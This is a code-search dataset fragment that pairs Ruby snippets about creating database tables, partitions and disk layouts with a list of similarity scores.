"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def _create_record(attribute_names = self.attribute_names)\n # ****** BEGIN PARTITIONED PATCH ******\n if self.id.nil? && self.class.respond_to?(:prefetch_primary_key?) && self.class.prefetch_primary_key?\n self.id = self.class.connection.next_sequence_value(self.class.sequence_name)\n attribute_names |= [\"id\"]\n end\n\n if self.class.respond_to?(:partition_keys)\n attribute_names |= self.class.partition_keys.map(&:to_s)\n end\n # ****** END PARTITIONED PATCH ******\n\n attributes_values = arel_attributes_with_values_for_create(attribute_names)\n\n new_id = self.class.unscoped.insert attributes_values\n self.id ||= new_id if self.class.primary_key\n\n @new_record = false\n id\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def add_topic(topic, partitions=nil)\n if partitions.is_a? Integer\n partitions = (0..partitions - 1)\n end\n if partitions.nil?\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n -1\n )\n else\n partitions.each do |partition|\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n partition\n )\n end\n end\n end",
"def create_table_cell_portion(name, slide_index, shape_index, row_index, cell_index, paragraph_index, dto, password = nil, folder = nil, storage = nil)\n data, _status_code, _headers = create_table_cell_portion_with_http_info(name, slide_index, shape_index, row_index, cell_index, paragraph_index, dto, password, folder, storage)\n data\n end",
"def add_key(name, type, clustering_order = nil)\n if @partition_key_columns.empty?\n unless clustering_order.nil?\n raise ArgumentError,\n \"Can't set clustering order for partition key #{name}\"\n end\n add_partition_key(name, type)\n else\n add_clustering_column(name, type, clustering_order)\n end\n end",
"def create!\n destroy!\n tables.each(&:create)\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def partitioned_state\n super\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create_kinesis_loads_table(exec=true)\n schema= {\n :columns => {\n :stream_name => { :type => 'varchar(64)' },\n :shard_id => { :type => 'varchar(64)' },\n :table_name => { :type => 'varchar(64)' },\n :starting_sequence_number => { :type => 'varchar(64)' },\n :ending_sequence_number => { :type => 'varchar(64)' },\n :load_timestamp => { :type => 'timestamp', :constraint => 'not null' }\n },\n :sortkey => 'load_timestamp'\n }\n\n return create_table_from_schema('kinesis_loads',exec,schema)\n end",
"def create_topic(name, partitions: nil, replication_factor: nil, config: nil)\n raise ArgumentError, \"partitions must be a positive integer\" if Integer(partitions) <= 0\n raise ArgumentError, \"replication_factor must be a positive integer\" if Integer(replication_factor) <= 0\n\n Kazoo::Topic.create(self, name, partitions: Integer(partitions), replication_factor: Integer(replication_factor), config: config)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def from(value)\n using(partition: value)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def setup_lvm_on_partition(part)\n return unless part.lvm\n\n pvol = \"/dev/disk/by-partlabel/#{part.label}\"\n execute!(\"pvcreate -y #{pvol}\")\n execute!(\"vgcreate -y #{part.lvm.vg_name} #{pvol}\")\n\n # any \"open ended\" volumes (no size specified), we deal with last\n unspec_vol = nil\n\n notice(\"Creating LVM partitions\")\n part.lvm.volumes.each do |vol|\n if not vol.size_mb.is_a?(Integer)\n unspec_vol = vol\n next\n end\n\n info(\"Creating #{vol.label} volume\")\n execute!(\"lvcreate -y --name #{vol.label} --size #{vol.size_mb}MiB #{part.lvm.vg_name}\")\n next if not vol.fs\n\n create_filesystem(vol.fs, \"/dev/#{part.lvm.vg_name}/#{vol.label}\", vol.label)\n end\n\n if unspec_vol\n vol = unspec_vol\n info(\"Creating #{vol.label} volume\")\n execute!(\"lvcreate -y --name #{vol.label} -l 100%FREE #{part.lvm.vg_name}\")\n if vol.fs\n create_filesystem(vol.fs, \"/dev/#{part.lvm.vg_name}/#{vol.label}\", vol.label)\n end\n end\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def partition(arr, number)\n new_arr = Array.new(2) {Array.new()}\n\n arr.each do |ele|\n ele < number ? new_arr[0] << ele : new_arr[1] << ele\n end\n new_arr\nend",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def create_fund_table\n Bsf::Scraper.db.create_fund_table\n end",
"def gen_partition_script(number_of_volumes, mount_point_prefix, resize_root_vol = false)\n resize_root = resize_root_vol ? 0 : 1\n template = <<-END.gsub(/^ {6}/, '')\n #!/bin/bash\n RESIZE_ROOT=<%= resize_root %>\n if [ $RESIZE_ROOT -eq 0 ]; then\n echo \"Resizing the root partition\"\n resize2fs /dev/`cat /proc/partitions | awk '/xvd*/ {print $4}' | head -n1`\n fi\n NUM_OF_VOLS=<%= number_of_volumes %>\n if [ $NUM_OF_VOLS -ne 0 ]; then\n DEVICES=`cat /proc/partitions | awk '/xvd*/ {print $4}' | tail -n<%= number_of_volumes %>`\n echo \"Formatting and mounting initiated\"\n count=1\n for dev in $DEVICES; do\n echo \"Formatting and mounting $dev\"\n fdisk -u /dev/$dev << EOF\n n\n p\n 1\n\n\n w\n EOF\n mkfs.ext4 /dev/${dev}1\n data_dir=$((count++))\n mkdir -p <%= mount_point_prefix %>/${data_dir}\n mount /dev/${dev}1 <%= mount_point_prefix %>${data_dir}\n done\n fi\n END\n ERB.new(template).result(binding)\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend"
] |
[
"0.7107491",
"0.69653577",
"0.6848916",
"0.6785471",
"0.66725737",
"0.6580608",
"0.6522106",
"0.64445055",
"0.64298666",
"0.6402236",
"0.6396007",
"0.61293477",
"0.6125929",
"0.60874057",
"0.6074051",
"0.60464454",
"0.5834928",
"0.5782722",
"0.57125735",
"0.5685198",
"0.5628669",
"0.5592334",
"0.5436821",
"0.543118",
"0.5377042",
"0.534393",
"0.5286028",
"0.5278216",
"0.5268954",
"0.5242946",
"0.52339214",
"0.5228444",
"0.5160669",
"0.51463825",
"0.5084462",
"0.5069188",
"0.5054688",
"0.5036526",
"0.5031731",
"0.501652",
"0.5013969",
"0.49931073",
"0.49791104",
"0.49745184",
"0.49639827",
"0.49445394",
"0.4933253",
"0.49150392",
"0.48947692",
"0.48751003",
"0.48659527",
"0.48521003",
"0.48384234",
"0.48260427",
"0.48189345",
"0.4816153",
"0.47832957",
"0.47799495",
"0.47730199",
"0.47691697",
"0.4764834",
"0.47617468",
"0.47568747",
"0.4747163",
"0.47438416",
"0.47385028",
"0.47175363",
"0.4714879",
"0.47148252",
"0.46962127",
"0.4688624",
"0.46877864",
"0.46849662",
"0.4674037",
"0.4669365",
"0.46686816",
"0.46499944",
"0.4647793",
"0.46403417",
"0.46397215",
"0.4638581",
"0.46166396",
"0.4615434",
"0.46116957",
"0.4608867",
"0.46082178",
"0.45991406",
"0.45941415",
"0.45856294",
"0.45803827",
"0.45788983",
"0.45737675",
"0.45720154",
"0.45627013",
"0.45607054",
"0.45595574",
"0.45535716",
"0.45492747",
"0.45287985",
"0.45236766"
] |
0.681942
|
3
|
SQL for creating a partition of another table.
|
def create_partition_of_table_sql(name, generator, options)
sql = create_table_prefix_sql(name, options).dup
sql << " PARTITION OF #{quote_schema_table(options[:partition_of])}"
case generator.partition_type
when :range
from, to = generator.range
sql << " FOR VALUES FROM #{literal(from)} TO #{literal(to)}"
when :list
sql << " FOR VALUES IN #{literal(generator.list)}"
when :hash
mod, remainder = generator.hash_values
sql << " FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})"
else # when :default
sql << " DEFAULT"
end
sql << create_table_suffix_sql(name, options)
sql
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def partition_list()\nend",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def create_blob_table(name, shard_count = 5, replicas = 0)\n stmt = %{CREATE BLOB TABLE \"#{name}\" CLUSTERED INTO ? SHARDS WITH (number_of_replicas=?)}\n execute stmt, [shard_count, replicas]\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def create_slice(col_name, col_value)\n ds = @data_source.create_sliced_table(col_name, col_value)\n dsp = self.class.new(ds.name, ds)\n def dsp.release; @data_source.release end\n dsp\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def create_prejoined_fact_table(options={})\r\n connection.transaction {\r\n drop_prejoin_fact_table\r\n\r\n connection.create_table(prejoined_table_name, :id => false) do |t|\r\n # get all columns except the foreign_key columns for prejoined dimensions\r\n columns.each do |c|\r\n t.column(c.name, c.type) unless excluded_foreign_key_names.include?(c.name)\r\n end\r\n #prejoined_columns\r\n prejoined_fields.each_pair do |key, value|\r\n dclass = dimension_class(key)\r\n dclass.columns.each do |c|\r\n t.column(c.name, c.type) if value.include?(c.name.to_sym) \r\n end\r\n end\r\n end\r\n }\r\n end",
"def gen_partition_script(number_of_volumes, mount_point_prefix, resize_root_vol = false)\n resize_root = resize_root_vol ? 0 : 1\n template = <<-END.gsub(/^ {6}/, '')\n #!/bin/bash\n RESIZE_ROOT=<%= resize_root %>\n if [ $RESIZE_ROOT -eq 0 ]; then\n echo \"Resizing the root partition\"\n resize2fs /dev/`cat /proc/partitions | awk '/xvd*/ {print $4}' | head -n1`\n fi\n NUM_OF_VOLS=<%= number_of_volumes %>\n if [ $NUM_OF_VOLS -ne 0 ]; then\n DEVICES=`cat /proc/partitions | awk '/xvd*/ {print $4}' | tail -n<%= number_of_volumes %>`\n echo \"Formatting and mounting initiated\"\n count=1\n for dev in $DEVICES; do\n echo \"Formatting and mounting $dev\"\n fdisk -u /dev/$dev << EOF\n n\n p\n 1\n\n\n w\n EOF\n mkfs.ext4 /dev/${dev}1\n data_dir=$((count++))\n mkdir -p <%= mount_point_prefix %>/${data_dir}\n mount /dev/${dev}1 <%= mount_point_prefix %>${data_dir}\n done\n fi\n END\n ERB.new(template).result(binding)\n end",
"def attach_to_range_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.attach_to_range_partition(parent_table_name, options)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def create_kinesis_loads_table(exec=true)\n schema= {\n :columns => {\n :stream_name => { :type => 'varchar(64)' },\n :shard_id => { :type => 'varchar(64)' },\n :table_name => { :type => 'varchar(64)' },\n :starting_sequence_number => { :type => 'varchar(64)' },\n :ending_sequence_number => { :type => 'varchar(64)' },\n :load_timestamp => { :type => 'timestamp', :constraint => 'not null' }\n },\n :sortkey => 'load_timestamp'\n }\n\n return create_table_from_schema('kinesis_loads',exec,schema)\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def partition(arr, n)\n\nend",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def partitioned_state\n super\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def attach_to_list_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n\n Tablature.database.attach_to_list_partition(parent_table_name, options)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def id_partition\n \n val = parent_id.to_s\n\n time = val[0..7]\n machine = val[8..13]\n pid = val[14..17]\n inc = val[18..23]\n \n # 000001\n \n [time, machine, pid, inc]\n\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n 